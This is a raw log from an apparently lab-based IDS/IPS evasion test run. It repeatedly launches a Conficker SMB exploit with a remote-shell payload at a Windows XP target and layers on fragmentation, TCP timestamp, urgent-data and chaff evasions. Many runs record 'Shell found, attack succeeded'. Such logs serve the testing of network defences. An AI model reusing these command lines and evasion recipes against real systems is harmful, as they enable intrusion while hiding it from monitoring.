- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55922 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=1c9Z+P8xUFc --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"5","3","8","random_msrpcbind" --evasion=[smb_openpipe,end]smb_fnameobf,"change_case|add_paths" --verifydelay=1000 --payload=shell
- Info: Using random seed 1c9Z+P8xUFf
- The following evasions are applied from stage smb_openpipe to end:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * Dummy paths are added ( a/b -> a/c/../b )
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.116:55922 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 8301 runs averaging 1.94 runs / second ; progress: 4274/43200.....
- 8306 runs averaging 1.94 runs / second ; progress: 4279/43200...........
- 8317 runs averaging 1.94 runs / second ; progress: 4284/43200........
- 8325 runs averaging 1.94 runs / second ; progress: 4289/432002015-06-08 00:30:59 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=44164 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=5Lqf8qkQDN4 --evasion=[msrpc_bind,end]netbios_chaff,"50%","empty_keepalive|msrpc_req|broken_length" --evasion=[msrpc_req,end]tcp_paws,"75%","6","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 5Lqf8qkQDN7
- The following evasions are applied from stage msrpc_bind to end:
- - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage msrpc_req to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.112:44164 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...2015-06-08 00:31:01 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26976 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=0CPbLvEWtYI --evasion=[start,end]tcp_paws,"1","3","alpharandomized" --evasion=[smb_opentree,end]tcp_paws,"5","159580752","unmodified" --verifydelay=1000 --payload=shell
- Info: Using random seed 0CPbLvEWtYL
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to end:
- Info: NetBIOS connection 10.62.90.112:26976 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 8331 runs averaging 1.94 runs / second ; progress: 4294/43200
- 8331 runs averaging 1.94 runs / second ; progress: 4299/43200........
- 8339 runs averaging 1.94 runs / second ; progress: 4304/43200...............
- 8354 runs averaging 1.94 runs / second ; progress: 4309/43200...............
- 8369 runs averaging 1.94 runs / second ; progress: 4314/43200....
- 8373 runs averaging 1.94 runs / second ; progress: 4319/43200.....
- 8378 runs averaging 1.94 runs / second ; progress: 4324/43200......Pid 1662 timed out - killed
- 2015-06-08 00:31:38 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25353 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=fWA5nBt8494 --evasion=[msrpc_bind,msrpc_req]smb_fnameobf,"change_case|add_paths" --evasion=[smb_connect,end]tcp_paws,"5","238199066","random_alpha" --evasion=[smb_opentree,end]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed fWA5nBt8495
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 238199066> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * Dummy paths are added ( a/b -> a/c/../b )
- Info: NetBIOS connection 10.62.90.110:25353 -> 10.35.1.207:445
- Terminated
- 8385 runs averaging 1.94 runs / second ; progress: 4329/43200.....
- 8390 runs averaging 1.94 runs / second ; progress: 4334/43200.
- 8391 runs averaging 1.93 runs / second ; progress: 4339/43200.......
- 8398 runs averaging 1.93 runs / second ; progress: 4344/43200............
- 8410 runs averaging 1.93 runs / second ; progress: 4349/43200..........Pid 2268 timed out - killed
- 2015-06-08 00:32:02 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55553 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=kxyX01oYSMk --evasion=[smb_opentree,end]smb_chaff,"13","write_flag","alphanum" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed kxyX01oYSMm
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 50% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage smb_opentree to end:
- - Before every 13th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
- Info: NetBIOS connection 10.62.90.117:55553 -> 10.35.1.207:445
- Terminated
- 2015-06-08 00:32:02 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53177 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=sooPHhEIT8g --evasion=[smb_connect,end]ipv4_frag,"104" --evasion=[smb_opentree,end]smb_decoytrees,"5","2","3","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed sooPHhEIT8i
- The following evasions are applied from stage smb_connect to end:
- - IPv4 fragments with at most 104 bytes per fragment
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 5 SMB trees are opened and 2 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.110:53177 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 8426 runs averaging 1.94 runs / second ; progress: 4354/43200.........
- 8435 runs averaging 1.94 runs / second ; progress: 4359/43200.........
- 8444 runs averaging 1.93 runs / second ; progress: 4364/43200....Pid 2527 timed out - killed
- 2015-06-08 00:32:18 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60882 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=T6XfWoQScYo --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_unspec","float_cray","byte3_nonzero","byte4_nonzero" --evasion=[smb_opentree,end]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed T6XfWoQScYp
- The following evasions are applied from stage smb_opentree to end:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - MSRPC NDR flag is modified:
- * Unspecified character encoding
- * Cray floating point value encoding
- * Reserved 3rd byte is set to a random non-zero value
- * Reserved 4th byte is set to a random non-zero value
- Info: NetBIOS connection 10.62.90.119:60882 -> 10.35.1.207:445
- Terminated
- ..
- 8451 runs averaging 1.93 runs / second ; progress: 4369/43200...............
- 8466 runs averaging 1.94 runs / second ; progress: 4374/43200......
- 8472 runs averaging 1.93 runs / second ; progress: 4379/43200
- 8472 runs averaging 1.93 runs / second ; progress: 4384/43200...
- 8475 runs averaging 1.93 runs / second ; progress: 4389/43200..........
- 8485 runs averaging 1.93 runs / second ; progress: 4394/43200.....
- 8490 runs averaging 1.93 runs / second ; progress: 4399/43200.......
- 8497 runs averaging 1.93 runs / second ; progress: 4404/43200
- 8497 runs averaging 1.93 runs / second ; progress: 4409/43200....
- 8501 runs averaging 1.93 runs / second ; progress: 4414/43200........2015-06-08 00:33:08 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59785 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=qI+MyxnbeGg --evasion=[start,msrpc_bind]ipv4_frag,"1464" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","5","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed qI+MyxnbeGi
- The following evasions are applied from stage start to msrpc_bind:
- - IPv4 fragments with at most 1464 bytes per fragment
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.118:59785 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 8512 runs averaging 1.93 runs / second ; progress: 4419/43200.....2015-06-08 00:33:12 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15707 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=i/S3e+bhers --evasion=[smb_openpipe,msrpc_bind]smb_fnameobf,"change_case|add_null_trailer" --evasion=[msrpc_req,end]tcp_paws,"50%","196394028","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed i/S3e+bheru
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * A 0x00 and random alphanumeric characters are appended to the filename
- The following evasions are applied from stage msrpc_req to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 196394028> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.118:15707 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 8520 runs averaging 1.93 runs / second ; progress: 4424/43200......
- 8526 runs averaging 1.92 runs / second ; progress: 4429/43200....
- 8530 runs averaging 1.92 runs / second ; progress: 4434/43200.....
- 8535 runs averaging 1.92 runs / second ; progress: 4439/43200....2015-06-08 00:33:33 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10990 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=KwjnkM1JXmw --evasion=[smb_connect,smb_openpipe]smb_decoytrees,"7","7","8","random_msrpcbind" --evasion=[msrpc_req,end]tcp_chaff,"1","chksum|nullchksum|nullflag|shorthdr|longhdr","zero" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","161608787","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed KwjnkM1JXmw
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - Before normal SMB writes, 7 SMB trees are opened and 7 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 161608787> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.118:10990 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 8541 runs averaging 1.92 runs / second ; progress: 4444/43200.....
- 8546 runs averaging 1.92 runs / second ; progress: 4449/43200.......
- 8553 runs averaging 1.92 runs / second ; progress: 4454/43200..Pid 4069 timed out - killed
- 2015-06-08 00:33:46 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45678 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=nv0/I9X2yH0 --evasion=[start,smb_openpipe]ipv4_frag,"1264" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed nv0/I9X2yH2
- The following evasions are applied from stage start to smb_openpipe:
- - IPv4 fragments with at most 1264 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.111:45678 -> 10.35.1.207:445
- Terminated
- ...
- 8559 runs averaging 1.92 runs / second ; progress: 4459/43200
- 8559 runs averaging 1.92 runs / second ; progress: 4464/43200..
- 8561 runs averaging 1.92 runs / second ; progress: 4469/43200Pid 4398 timed out - killed
- 2015-06-08 00:34:00 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60638 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=20s+1xE/E2Q --evasion=[msrpc_req,end]netbios_chaff,"1","empty_keepalive|http_post|msrpc_req" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 20s+1xE/E2T
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 75% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- Info: NetBIOS connection 10.62.90.115:60638 -> 10.35.1.207:445
- Terminated
- ...........
- 8573 runs averaging 1.92 runs / second ; progress: 4475/432002015-06-08 00:34:05 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22375 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=XYxpSCVMOvI --evasion=[smb_connect,msrpc_bind]smb_writeandxpad,"509","zero" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","43065069","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed XYxpSCVMOvJ
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 509 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 43065069> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.111:22375 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 8585 runs averaging 1.92 runs / second ; progress: 4480/43200............
- 8597 runs averaging 1.92 runs / second ; progress: 4485/43200..............
- 8611 runs averaging 1.92 runs / second ; progress: 4490/43200..............
- 8625 runs averaging 1.92 runs / second ; progress: 4495/43200...........
- 8636 runs averaging 1.92 runs / second ; progress: 4500/43200.Pid 4839 timed out - killed
- 2015-06-08 00:34:31 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22602 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=b9XU0yKQnxs --evasion=[start,netbios_connect]ipv4_frag,"48" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed b9XU0yKQnxt
- The following evasions are applied from stage start to netbios_connect:
- - IPv4 fragments with at most 48 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.113:22602 -> 10.35.1.207:445
- Terminated
- .........
- 8647 runs averaging 1.92 runs / second ; progress: 4505/43200............2015-06-08 00:34:38 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25522 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=F5bVtHv8w7c --evasion=[smb_openpipe,msrpc_req]smb_fnameobf,"change_case" --evasion=[start,end]tcp_paws,"3","126118068","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed F5bVtHv8w7c
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 126118068> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- Info: NetBIOS connection 10.62.90.111:25522 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ....
- 8664 runs averaging 1.92 runs / second ; progress: 4510/43200..........
- 8674 runs averaging 1.92 runs / second ; progress: 4515/43200.......
- 8681 runs averaging 1.92 runs / second ; progress: 4520/43200.........
- 8690 runs averaging 1.92 runs / second ; progress: 4525/43200.............
- 8703 runs averaging 1.92 runs / second ; progress: 4530/43200...........
- 8714 runs averaging 1.92 runs / second ; progress: 4535/43200..........
- 8724 runs averaging 1.92 runs / second ; progress: 4540/43200..........
- 8734 runs averaging 1.92 runs / second ; progress: 4545/43200.......2015-06-08 00:35:18 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42635 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=TuoN/Fks6dA --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"24" --evasion=[smb_opentree,smb_openpipe]ipv4_opt,"3","inc","alphanumrandomized" --evasion=[msrpc_bind,end]smb_decoytrees,"4","6","8","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed TuoN/Fks6dB
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphanumeric characters are randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - IPv4 fragments with at most 24 bytes per fragment
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 4 SMB trees are opened and 6 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.118:42635 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .......
- 8749 runs averaging 1.92 runs / second ; progress: 4550/43200.............
- 8762 runs averaging 1.92 runs / second ; progress: 4555/43200...........2015-06-08 00:35:28 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36182 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=HBD+cGWNJlg --evasion=[netbios_connect,end]ipv4_opt,"3","inc","zero" --evasion=[msrpc_bind,end]tcp_paws,"3","51055844","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed HBD+cGWNJlg
- The following evasions are applied from stage netbios_connect to end:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage msrpc_bind to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 51055844> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.119:36182 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 8782 runs averaging 1.93 runs / second ; progress: 4560/43200
- 8782 runs averaging 1.92 runs / second ; progress: 4565/43200..2015-06-08 00:35:37 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35443 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=PMOGjF6h7ww --evasion=[smb_connect,smb_openpipe]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_opentree,end]tcp_paws,"5","8","random" --verifydelay=1000 --payload=shell
- Info: Using random seed PMOGjF6h7ww
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.111:35443 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 8791 runs averaging 1.92 runs / second ; progress: 4570/43200............
- 8803 runs averaging 1.92 runs / second ; progress: 4575/43200..................
- 8821 runs averaging 1.93 runs / second ; progress: 4580/43200............
- 8833 runs averaging 1.93 runs / second ; progress: 4585/43200.......
- 8840 runs averaging 1.93 runs / second ; progress: 4590/43200......
- 8846 runs averaging 1.92 runs / second ; progress: 4595/43200....
- 8850 runs averaging 1.92 runs / second ; progress: 4600/43200.........
- 8859 runs averaging 1.92 runs / second ; progress: 4605/43200.............
- 8872 runs averaging 1.92 runs / second ; progress: 4611/43200...2015-06-08 00:36:21 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35389 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=T0PbYlV/b4Y --evasion=[smb_openpipe,end]smb_fnameobf,"add_paths" --evasion=[msrpc_req,end]tcp_paws,"75%","8","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed T0PbYlV/b4Z
- The following evasions are applied from stage smb_openpipe to end:
- - The SMB filename is obfuscated:
- * Dummy paths are added ( a/b -> a/c/../b )
- The following evasions are applied from stage msrpc_req to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.118:35389 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....Pid 6902 timed out - killed
- 2015-06-08 00:36:24 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52459 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=4c8g/DIFW7I --evasion=[smb_openpipe,msrpc_req]smb_chaff,"13","write_flag","zero" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 4c8g/DIFW7L
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before every 13th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- Info: NetBIOS connection 10.62.90.114:52459 -> 10.35.1.207:445
- Terminated
- ..
- 8883 runs averaging 1.92 runs / second ; progress: 4616/43200......
- 8889 runs averaging 1.92 runs / second ; progress: 4621/43200....
- 8893 runs averaging 1.92 runs / second ; progress: 4626/43200.........
- 8902 runs averaging 1.92 runs / second ; progress: 4631/43200
- 8902 runs averaging 1.92 runs / second ; progress: 4636/43200
- 8902 runs averaging 1.92 runs / second ; progress: 4641/43200......
- 8908 runs averaging 1.92 runs / second ; progress: 4646/43200.........
- 8917 runs averaging 1.92 runs / second ; progress: 4651/43200.......
- 8924 runs averaging 1.92 runs / second ; progress: 4656/43200..
- 8926 runs averaging 1.92 runs / second ; progress: 4661/43200.
- 8927 runs averaging 1.91 runs / second ; progress: 4666/43200.Pid 7659 timed out - killed
- 2015-06-08 00:37:18 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=48863 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=iOiNE51qbIE --evasion=[netbios_connect,msrpc_bind]tcp_urgent,"8","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed iOiNE51qbIG
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - Add a random alphanumeric urgent data byte to every 8 TCP segment.
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.117:48863 -> 10.35.1.207:445
- Terminated
- .....
- 8934 runs averaging 1.91 runs / second ; progress: 4671/43200..Pid 7806 timed out - killed
- 2015-06-08 00:37:22 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52933 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Iv5+sA53FSw --evasion=[smb_opentree,smb_openpipe]smb_chaff,"75%","write_flag","msrpc" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed Iv5+sA53FSw
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - 75% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- Info: NetBIOS connection 10.62.90.116:52933 -> 10.35.1.207:445
- Terminated
- .....Pid 7870 timed out - killed
- 2015-06-08 00:37:25 INFO
- Timed out (10.62.90.110):
